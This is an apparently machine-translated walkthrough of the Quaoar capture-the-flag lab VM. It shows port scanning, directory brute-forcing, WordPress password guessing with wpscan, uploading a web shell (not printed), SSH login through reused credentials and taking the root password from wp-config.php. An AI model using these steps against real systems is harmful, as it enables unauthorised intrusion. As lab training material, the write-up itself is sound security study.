VulnHub: New series - hackfest2016 Quaoar

Good day to all. For a long time I did not lay out ratipy lab with VulnHub . During this time, there appeared a small selection of images of virtual machines ready for hacking. In this article we will start the analysis of images prepared for the recently passed Hackfest 2016 CTF , namely, we will consider Quaoar , which you can download here.

In total, as follows from the description, there are 3 flags:

1. Getting access to the shell;
2. Privilege escalation to root;
3. Post-exploitation.

With a more detailed description anyone can get acquainted on their own, so let's start.

Flag 1

After starting the virtual, we are kindly informed of the IP address at which it is available:
')


Therefore, we immediately proceed to port scanning:

$ sudo nmap -p1-65535 192.168.1.75 -sV 

Starting Nmap 7.01 ( nmap.org ) at 2017-04-16 16:26 MSK
Nmap scan report for 192.168.1.75
Host is up (0.00043s latency).
Not shown: 65526 ​​closed ports
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53 / tcp open domain ISC BIND 9.8.1-P1
80 / tcp open http Apache httpd 2.2.22 ((Ubuntu))
110 / tcp open pop3?
139 / tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143 / tcp open imap Dovecot imapd
445 / tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993 / tcp open ssl / imap Dovecot imapd
995 / tcp open ssl / pop3s?
MAC Address: 08: 00: 27: 0A: CA: 7B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe: / o: linux: linux_kernel

The description said about the search directories. Are looking for:

 $ sudo dirsearch -u http://192.168.1.75/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html -x 403 -r -f 

Most of the images found are in the style of this:


In the upload is a site with a hard-ip ip'shnikom.

 $ ./robotscan.py -u http://192.168.1.75/upload/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html -x 403 

I’m lazy to change ip , so we’ll leave it for now, but in the wordpress directory there is a full blog. Plus, it is referenced by the robots.txt file.

Let's see what wpscan says:

 $ sudo ./wpscan.rb --url http://192.168.1.75/wordpress/ --wordlist /usr/share/john/password.lst 

Wpscan found the correct password, although he did not understand it. Log in to admin panel and fill in a simple shell there:



First we look at the contents of / etc / passwd



In the home directory of the wpadmin user, we find the first flag:

Flag2

Since the password from the admin in wordpress turned out to be the same as the login, it is worth trying the same trick for ssh :

 $ ssh wpadmin@192.168.1.75 

Having specified wpadmin as the password, we successfully fall into the shell. Search SUID / SGID files result is not brought. Looking at the configs for the presence of at least some passwords, we find one interesting one:

wpadmin @ Quaoar: ~ $ cat wp-config.php

 define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'rootpassword!'); 

This is a cogfig for the connection to the database, but suddenly this password is also from the account ... We check this and +1 flag in the home directory of the root:

 root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb 

Flag3

If with the first 2 flags everything is more or less clear, then the search for the third took too much time. I tried to find more files called flag

 root@Quaoar:~# find / -name flag.txt /root/flag.txt /home/wpadmin/flag.txt root@Quaoar:~# find / -name flag 

But nothing. An attempt to search for content by the word flag , also did not produce a result:

 root@Quaoar:~# grep -r flag / | less 

Ultimately, it was decided that since the flag is an MD5 hash, it can probably be found using regular expressions. No sooner said than done:

 root@Quaoar:~# egrep -r " [a-z0-9]{32,32}" /etc/ 2>/dev/null ... /etc/cron.d/php5:# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de 

Of course, it would be logical to preview the tasks in cron , but the alternative is also good.

That's all. All 3 flags found. You can proceed to the next level.